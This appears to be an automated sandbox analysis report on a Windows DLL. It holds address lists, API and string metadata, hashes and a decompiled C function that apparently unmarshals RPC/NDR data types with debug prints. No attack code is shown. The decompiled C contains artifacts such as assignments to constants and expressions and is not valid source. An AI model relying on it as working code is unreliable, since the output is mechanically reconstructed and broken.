                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994b
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f0
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAAFA0: RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001,?,?,?,?,?,?,6EDA3C70,?,00000000), ref: 6EDAAFE9
                                                                                                  • Part of subcall function 6EDAAFA0: _memmove.LIBCMT ref: 6EDAB016
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$int3264=%ld => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 2890701851-428653425
                                                                                                • Opcode ID: 4c1e46c716b09a463f737b4cd28b163a3e8d02ef3333489d52d607862503c3b1
                                                                                                • Instruction ID: 538ff7b30f40be6edc45a9e7ec288dca6edf6461cf1c5260239bcf7da9e491b7
                                                                                                • Opcode Fuzzy Hash: 4c1e46c716b09a463f737b4cd28b163a3e8d02ef3333489d52d607862503c3b1
                                                                                                • Instruction Fuzzy Hash: 0CD129B5A00108AFCB04CF99E890EEA77B9AF89314F04C519FA195F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 24%
                                                                                                			E6EDA99A7() {
                                                                                                				void* _t219;
                                                                                                				void* _t221;
                                                                                                				void* _t222;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					E6EDB0770( *(_t219 + 0xc), 0, ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c);
                                                                                                					_t222 = _t221 + 0xc;
                                                                                                					 *(_t219 + 0xc) =  *(_t219 + 0xc) + ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                					while(1) {
                                                                                                						L47:
                                                                                                						 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t219 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t219 - 0xc) =  *( *(_t219 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t219 - 0xc) =  *(_t219 - 0xc) - 1;
                                                                                                							if( *(_t219 - 0xc) > 0xb8) {
                                                                                                								L46:
                                                                                                								0x6eda0000("unhandled format %d\n",  *( *(_t219 + 0x10)) & 0x000000ff);
                                                                                                								_t222 = _t222 + 8;
                                                                                                								while(1) {
                                                                                                									L47:
                                                                                                									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t15 =  *(_t219 - 0xc) + 0x6eda9b24; // 0xcccccc0f
                                                                                                							switch( *((intOrPtr*)(( *_t15 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									E6EDAAFA0( *((intOrPtr*)(_t219 + 8)),  *(_t219 + 0xc), 1);
                                                                                                									_push( *(_t219 + 0xc));
                                                                                                									_push( *( *(_t219 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									_t222 = _t222 + 0x18;
                                                                                                									 *(_t219 + 0xc) =  &(( *(_t219 + 0xc))[0]);
                                                                                                									L47:
                                                                                                									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L12:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [eax]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L13:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									_push(__eax);
                                                                                                									__ecx =  *__edx;
                                                                                                									_push(__ecx);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L14:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [eax]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L15:
                                                                                                									 *(__ebp - 0x1c) = 0;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									_push("pointer => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(__ecx != 0x11) {
                                                                                                										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x1c) = 1;
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp - 0x20);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                										L29:
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp + 0x14);
                                                                                                											__ecx =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) = __ecx;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L47:
                                                                                                											 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L24:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x20);
                                                                                                										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L29;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L33:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L34:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L35:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									goto L0;
                                                                                                								case 0xc:
                                                                                                									L36:
                                                                                                									1 = 1 << 0;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp - 0x18);
                                                                                                									_push( *(__ebp - 0x18));
                                                                                                									_push("embedded complex (size=%d) => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                										__edx =  *(__ebp + 0xc);
                                                                                                										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                                									}
                                                                                                									__eax =  *(__ebp - 8);
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__edx =  *(0x6edbb418 + __ecx * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no unmarshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp - 8);
                                                                                                										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax = __ebp + 0xc;
                                                                                                											_push(__ebp + 0xc);
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									L45:
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xe:
                                                                                                									L10:
                                                                                                									__edx = __ebp - 0x24;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ebp - 0x24);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *__ecx;
                                                                                                									_push( *__ecx);
                                                                                                									_push("int3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xf:
                                                                                                									L11:
                                                                                                									__ecx = __ebp - 0x28;
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp - 0x28);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
